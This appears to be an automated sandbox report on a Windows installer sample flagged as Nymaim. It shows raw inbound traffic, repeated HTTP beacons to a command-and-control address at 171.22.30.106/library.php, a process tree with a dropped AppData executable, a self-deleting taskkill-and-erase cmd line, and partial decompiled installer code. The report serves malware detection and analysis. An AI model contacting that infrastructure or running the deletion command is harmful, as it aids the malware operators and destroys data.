0f a1 6e 90 a8 45 d3 69 08 4f af 9c 6f af 55 1e 42 c9 50 78 d3 de b2 de 0b 31 7b 2c 61 10 da cf f3 f6 23 6b cd ad 64 6a be ed 4c 34 cc 0f d2 7d da 64 3c 95 14 a4 a8 d5 d9 49 79 79 c4 a0 4a a7 fb 66 ee 57 c4 10 2c 5e 76 56 da 41 6f d4 4b d4 22 2b 4f 58 38 21 46 a7 02 f1 59 50 8b ea bd f5 75 b6 2d e6 ed 42 69 6b eb a5 5b e2 75 05 9b c1 26 57 74 bc 84 50 af f4 7f 6d cf 00 10 8e 5e 20 c8 9a c9 6b 7e e2 01 2e a3 90 6c fe d3 6f a6 7a 4d 56 1c 21 73 2e ed b6 68 80 f0 c3 7b 0f 6e 32 3b 7a d7 d9 cc 4b db 04 3f 53 c5 93 f4 2d 96 0d f9 65 57 e0 e0 ac cf 63 dc fa f2 1b e6 2d 56 dd 62 67 ff ff 39 da 49 c5 05 67 ba 78 fa 67 cb b7 ba ef 7d c3 27 e6 35 d2 c0 28 2a 50 b3 e8 b7 93 c8 4a 23 97 18 3a b5 49 53 b4 08 44 7d 8e 76 8a 97 c3 09 ea 9d 15 6a 4b 39 03 4c 51 46 aa 0f 00 Data Ascii: mi};F")T'K;OY0:3j\Ij2RPCq\|2iR2WFC=MUH6A@OcMx8L- b\|CZ}w.laaTbr,6w#jPli=oS{R.5#;-b+G(>QiN{+yZCz3sET2J39U4&P"wI@x%>D'z^^(NC[[kV]G)e`K/LUlF"8$Ad:ig0d[.T"lUM=0,,kuW,7`QFi=wu:Q-R}0LntnvzeIC9V~1+[]7xQ$LoeQ/bZp];i)#b%1@G[/cZG:nEiOoUBPx1{,a#kdjL4}d<IyyJfW,^vVAoK"+OX8!FYPu-Bik[u&WtPm^ k~.lozMV!s.h{n2;zK?S-eWc-Vbg9Igxg}'5(PJ#:ISD}vjK9LQF
Nov 24, 2022 20:04:07.195625067 CET	99	IN	Data Raw: 6f 4f 68 56 80 cb c2 29 e2 a1 68 c5 76 5e 2d 04 d2 46 81 ff 08 3c 8f 84 16 ba bb 56 68 88 31 b9 c0 b3 d7 21 97 b1 05 21 8b c0 0f 42 59 63 04 9a 43 3f 8b f4 44 32 04 a3 b3 c2 c1 32 d5 4b 28 a2 a0 36 f6 19 9a 1b 42 d5 15 bd 92 44 90 aa 61 79 b9 b8 Data Ascii: oOhV)hv^-F<Vh1!!BYcC?D22K(6BDay=\|'[1~YB:/A`=FKqTw-blBC:>e5.jNK=ZGj:V.:gP~tm~ "A1jNR[PX~LgT%
Nov 24, 2022 20:04:07.195647955 CET	100	IN	Data Raw: 20 2f b2 fc fb 3b 22 62 e0 b2 2f c2 80 40 84 cb 02 1f 37 3d 0d 0c 1a 55 11 be 34 89 65 ce bc 3a 9c 5c 05 87 3d bb e8 1a 84 38 46 23 32 4d fc be ea 80 62 5b 19 72 10 35 1e b7 8a 98 4d a2 eb 87 6c 74 d4 1d e4 9d 35 68 f5 a9 e5 08 ea 2b 4d 6b 11 a1 Data Ascii: /;"b/@7=U4e:\=8F#2Mb[r5Mlt5h+Mk>eOk6wB!mMf@yHW0>GX\|2";J=MgPAqTW/j*qO}([=\|Dltn3)fF@}Mr
Nov 24, 2022 20:04:07.195672035 CET	102	IN	Data Raw: a7 85 09 11 e8 87 fa 45 9c 6e e3 22 3a 8b 3a 37 cb 18 c6 c9 0c 95 19 a5 fd b0 6a 49 fe 1b fe ae 5a 87 a0 39 48 bd 07 52 c2 4c a3 6c d5 9e 43 04 16 b3 be ff 0d 7e 75 6b 76 df 83 39 76 49 20 81 05 f4 44 2b 77 e4 4d b2 06 16 49 eb 4f 6e 06 26 32 98 Data Ascii: En"::7jIZ9HRLlC~ukv9vI D+wMIOn&2wSCi-Mxyi=&{32cT[\wc70#q6F=hbB4P\U8BOpw0IZdET,.k]N{S!d*$;q,
Nov 24, 2022 20:04:07.195697069 CET	103	IN	Data Raw: 4d 96 87 7f 63 be 6a e0 a7 12 2c 76 97 11 b2 61 1a 8c 52 86 70 00 11 79 15 ef 90 33 7a 8b 69 b8 d1 93 89 5d 20 a4 63 5d de 1c 51 fe 73 46 db 21 4d c9 ea f7 67 60 2f e1 a9 04 18 e8 c1 d7 b3 44 78 0e 75 21 3a 8b 07 a0 01 19 e6 77 51 13 23 87 dc 93 Data Ascii: Mcj,vaRpy3zi] c]QsF!Mg`/Dxu!:wQ#[Xs~w0)w(cU6@(R#a0Sj!P[N^/c&;<5`V(Tys6gMn ?.Vz]X6?hGynK;YVYK
Nov 24, 2022 20:04:07.195724964 CET	104	IN	Data Raw: 21 b9 4c 3c 58 1f 3e b0 46 f6 ca 4f d4 3b 5d 88 04 a1 eb 28 78 da b0 51 20 02 9f d0 8e b2 b6 6e de 77 3f 8e 24 81 58 61 dc f1 2f 50 d4 78 14 e3 ed 48 fd 34 28 b3 3c 8d c4 b1 fb b3 81 1a a3 cc 05 30 f2 1b f9 e2 ee 54 f2 cb e6 99 0e 52 e0 62 83 e1 Data Ascii: !L<X>FO;](xQ nw?$Xa/PxH4(<0TRbY\|/V)s8igrzEm<G_+/G.t#\|1;'Ui9yQYXP^^8]7_Y(*Mt%k+p.(zg
Nov 24, 2022 20:04:07.195753098 CET	106	IN	Data Raw: 68 3c a5 e0 8c 19 ff b7 b6 66 fd 50 d8 d9 59 25 6f 43 24 25 d2 09 74 d5 15 b3 3e 2c 54 69 50 e7 2e cc 3b db c1 ab f1 19 b7 ff f3 7e 50 4b 36 6e 85 9a 1e 0e d4 5d 9f a5 ae ce 78 88 33 b5 ca 41 3d a1 fd 67 c3 9e 53 a3 30 2c b4 41 90 66 8e 73 85 77 Data Ascii: h<fPY%oC$%t>,TiP.;~PK6n]x3A=gS0,Afswy\cCDw6m&g}fom?ZIhA/-'1D8$$@S9&h0a7lLl 9Wyu0
Nov 24, 2022 20:04:07.195781946 CET	107	IN	Data Raw: 24 ad 2e af 1c 5c fa b9 f9 cf 44 8d d0 e8 a4 24 09 87 fb a0 14 ac b1 57 7d 53 55 c3 8d 9b d7 93 44 32 17 30 78 13 2a 5a 0b e8 52 6e 89 17 ad ea 8f 4a 5f d2 cb 2f 97 d7 ed f3 95 a9 50 7f 49 f6 6f 84 95 c0 12 8d 28 dd a7 d0 4c 02 91 fe 7f 5a bd 70 Data Ascii: $.\D$W}SUD20x*ZRnJ_/PIo(LZp1+,j%MClj5NZ32Pu0'1b}V}JCC;H@mX`5Xgw[iag7X"G{K
Nov 24, 2022 20:04:07.195808887 CET	108	IN	Data Raw: d9 c8 d5 72 52 2b 1f a9 ce 14 25 d2 bc be a1 c8 e3 db 90 60 1d e7 64 da 5b 9b 91 87 b9 96 91 4c f6 68 b8 24 66 6d 17 12 16 9b ce c1 4d ad 21 e8 ac e7 91 d6 2b 8a 70 d8 07 6d f6 7c 51 aa ae 5c 46 a3 5b a8 63 78 5a 2f b7 91 d6 fb a1 2d a8 64 d9 d7 Data Ascii: rR+%`d[Lh$fmM!+pm\|Q\F[cxZ/-dIa_hYwOi@{c5$:u[x{'B4oXa\H_f$%^gZr~Q> F>!<}Nw^~a\"[T/B&
Nov 24, 2022 20:04:07.195836067 CET	110	IN	Data Raw: 20 4c ba 5f 6e 12 80 56 cf 7a 46 07 bc 39 50 89 7d 09 31 b0 10 e3 35 18 30 d6 9b 45 e7 53 0e 8b 5a 89 04 ed 1f 63 58 26 ed 05 56 f6 04 b0 4b 49 41 ec 72 6f 33 13 31 cb 04 d8 ae a2 60 68 7a 07 c2 58 2d 03 77 38 4e e5 40 a5 1d e8 35 b1 0b 06 8e e7 Data Ascii: L_nVzF9P}150ESZcX&VKIAro31`hzX-w8N@5Yf8w}-^)Eja.] )jKNb$Etb6k@+P/zksThrw^NWchEZX(E\8J9alG/Cm-Q95Q@J1_lHl
Nov 24, 2022 20:04:07.223795891 CET	111	IN	Data Raw: df 45 f8 57 13 1c bc db 95 00 23 48 83 a9 9d cc 72 58 44 3a 28 86 1f 1a ff f8 b0 74 76 a4 81 88 29 df fd 47 64 5f 13 3c 75 e5 f1 4c fe d9 14 bc 60 1b ac a3 1b 17 61 a9 b7 fa 7f c7 86 61 d6 5f f0 b1 f3 ff 55 3d 50 be ad 32 1d c1 19 a0 b5 56 32 5f Data Ascii: EW#HrXD:(tv)Gd_<uL`aa_U=P2V2_bFM{!wahJs m<'Js{>vB;C+M]5r4:kRP:OjQUFLDQKp+CNZ!cQ:*V

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49700	171.22.30.106	80	C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 20:04:07.517386913 CET	196	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:08.183096886 CET	197	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 24, 2022 20:04:10.274821043 CET	206	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:10.921152115 CET	206	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 24, 2022 20:04:13.009390116 CET	207	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:13.651431084 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 24, 2022 20:04:16.725641966 CET	207	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:17.408674002 CET	208	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 24, 2022 20:04:19.479399920 CET	208	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:20.138571024 CET	208	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 24, 2022 20:04:22.232724905 CET	209	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:22.886122942 CET	209	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 24, 2022 20:04:25.004755020 CET	210	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:25.909393072 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 24, 2022 20:04:27.996823072 CET	211	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:28.684456110 CET	211	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 24, 2022 20:04:30.746705055 CET	211	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:31.385026932 CET	212	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 24, 2022 20:04:33.849196911 CET	212	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:34.525691032 CET	213	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Nov 24, 2022 20:04:36.730756998 CET	213	OUT	GET /library.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 2 Host: 171.22.30.106 Connection: Keep-Alive Cache-Control: no-cache
Nov 24, 2022 20:04:37.394530058 CET	213	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 19:04:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 6084, Parent PID: 3452

General

Target ID:	0
Start time:	20:03:59
Start date:	24/11/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	1488975 bytes
MD5 hash:	2ED741014B8CDAFD91A740432A3CFFA1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: is-QPTG8.tmpPID: 6080, Parent PID: 6084

General

Target ID:	1
Start time:	20:04:00
Start date:	24/11/2022
Path:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp" /SL4 $40228 "C:\Users\user\Desktop\file.exe" 1252960 51712
Imagebase:	0x400000
File size:	658944 bytes
MD5 hash:	85B94E72C3F2D2B5464E2AAF3C9E242A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: PrintFolders.exePID: 4532, Parent PID: 6080

General

Target ID:	2
Start time:	20:04:02
Start date:	24/11/2022
Path:	C:\Program Files (x86)\PrintFolders\PrintFolders.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\PrintFolders\PrintFolders.exe"
Imagebase:	0x400000
File size:	1990648 bytes
MD5 hash:	2ABBE052537A4C836AFE8DBAC888F131
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.325696039.0000000001660000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.326103420.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: uywwtiNQ.exePID: 6120, Parent PID: 4532

General

Target ID:	3
Start time:	20:04:06
Start date:	24/11/2022
Path:	C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0xbc0000
File size:	73728 bytes
MD5 hash:	3FB36CB0B7172E5298D2992D42984D06
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 46%, ReversingLabs
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1336, Parent PID: 4532

General

Target ID:	13
Start time:	20:04:39
Start date:	24/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im "PrintFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" & exit
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1760, Parent PID: 1336

General

Target ID:	14
Start time:	20:04:39
Start date:	24/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 3416, Parent PID: 1336

General

Target ID:	15
Start time:	20:04:39
Start date:	24/11/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im "PrintFolders.exe" /f
Imagebase:	0xd80000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 6084, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	22.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.9%
Total number of Nodes:	1455
Total number of Limit Nodes:	22

Executed Functions

Function 004095D0 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004095D0(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				long _t17;
				long _t20;
				int _t23;
				void* _t33;
				void* _t34;
				struct _MEMORY_BASIC_INFORMATION* _t35;
				void* _t36;
				DWORD* _t37;

				_t34 = __eax;
				_t35 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t17 = VirtualQuery(_t34, _t35, 0x1c);
				if(_t17 == 0) {
					L17:
					return _t17;
				} else {
					while(1) {
						_t17 = _t35->AllocationBase;
						if(_t17 != _t34) {
							goto L17;
						}
						if(_t35->State != 0x1000 || (_t35->Protect & 0x00000001) != 0) {
							L15:
							_t17 = VirtualQuery(_t35->BaseAddress + _t35->RegionSize, _t35, 0x1c);
							if(_t17 == 0) {
								goto L17;
							}
							continue;
						} else {
							_t33 = 0;
							_t20 = _t35->Protect;
							if(_t20 == 1 || _t20 == 2 || _t20 == 0x10 || _t20 == 0x20) {
								_t23 = VirtualProtect(_t35->BaseAddress, _t35->RegionSize, 0x40, _t37); // executed
								if(_t23 != 0) {
									_t33 = 1;
								}
							}
							_t36 = 0;
							while(_t36 < _t35->RegionSize) {
								E004095C8(_t35->BaseAddress + _t36);
								_t36 = _t36 + _v80.dwPageSize;
							}
							if(_t33 != 0) {
								VirtualProtect( *_t35, _t35->RegionSize, _v84, _t37); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}

0x004095d7
0x004095d9
0x004095e2
0x004095ed
0x004095f4
0x0040968b
0x0040968b
0x004095fa
0x00409679
0x00409679
0x0040967e
0x00000000
0x00000000
0x00409603
0x00409665
0x00409670
0x00409677
0x00000000
0x00000000
0x00000000
0x0040960b
0x0040960b
0x0040960d
0x00409613
0x0040962e
0x00409635
0x00409637
0x00409637
0x00409635
0x00409639
0x0040964a
0x00409641
0x00409646
0x00409646
0x00409651
0x00409660
0x00409660
0x00000000
0x00409651
0x00409603
0x00000000
0x00409679

APIs

GetSystemInfo.KERNEL32(?), ref: 004095E2
VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 004095ED
VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 0040962E
VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409660
VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409670

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: 85b18180d66bdf2954a0f01b34dac3b484fd17edf4cef21fe59ba73b4be0088e
Instruction ID: 0656fbc56265512395c7473ff46e648f44ffc8c3e8aba936dfc90547529e206a
Opcode Fuzzy Hash: 85b18180d66bdf2954a0f01b34dac3b484fd17edf4cef21fe59ba73b4be0088e
Instruction Fuzzy Hash: E421AEB1600704ABC730AA69CC85E57B7D89B45364F044C3AFA89E23D2D77AEC408A69

Uniqueness

Uniqueness Score: -1.00%

Function 004051C8 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004051C8(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100); // executed
				_t19 = _t5;
				if(_t5 <= 0) {
					return E0040322C(_t10, _t18);
				}
				return E00403278(_t10, _t5 - 1,  &_v260, _t19);
			}

0x004051d3
0x004051d5
0x004051e6
0x004051eb
0x004051ed
0x00000000
0x00405205
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040B4BC,00000001,?,00405293,?,00000000,00405372), ref: 004051E6

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 0f065b524a5ae8c1bbc1f93c4350eb024ca65793e4df99a60d4c7e896da620a2
Instruction ID: fe7bbfd5d4e4c6ef40831497ab1799179caed6740609745ba53a66c6a9ac1ef8
Opcode Fuzzy Hash: 0f065b524a5ae8c1bbc1f93c4350eb024ca65793e4df99a60d4c7e896da620a2
Instruction Fuzzy Hash: EBE0927170021827D710A9699C86AEB725CDB58314F0042BFFA14E73C2EDB49E804AED

Uniqueness

Uniqueness Score: -1.00%

Function 00409428 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00409428(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				DWORD* _v8;
				char _v12;
				char _v80;
				void* _v92;
				void* _v96;
				char _v124;
				void* _t24;
				MSG* _t45;
				intOrPtr _t53;
				void* _t60;

				_v12 = 0;
				_v8 = __ecx;
				_t57 = __eax;
				_t45 =  &_v124;
				_push(_t60);
				_push(0x409518);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xffffff88;
				_push(0x409530);
				_push(__eax);
				_push(E0040953C);
				_push(__edx);
				E004033B4();
				E0040277C( &_v80, 0x44);
				_v80 = 0x44;
				_push( &_v96);
				_push( &_v80);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t24 = E004034B8(_v12);
				_push(_t24);
				_push(0); // executed
				L00404480(); // executed
				_t63 = _t24;
				if(_t24 == 0) {
					E00409074(0x62, _t45, 0, __edx, _t57, _t63);
				}
				CloseHandle(_v92);
				L4:
				while(PeekMessageA(_t45, 0, 0, 0, 1) != 0) {
					TranslateMessage(_t45);
					DispatchMessageA(_t45);
				}
				if(MsgWaitForMultipleObjects(1,  &_v96, 0, 0xffffffff, 0xff) == 1) {
					goto L4;
				}
				GetExitCodeProcess(_v96, _v8); // executed
				CloseHandle(_v96);
				_pop(_t53);
				 *[fs:eax] = _t53;
				_push(E0040951F);
				return E00403198( &_v12);
			}

0x00409433
0x00409436
0x0040943b
0x0040943d
0x00409442
0x00409443
0x00409448
0x0040944b
0x0040944e
0x00409453
0x00409454
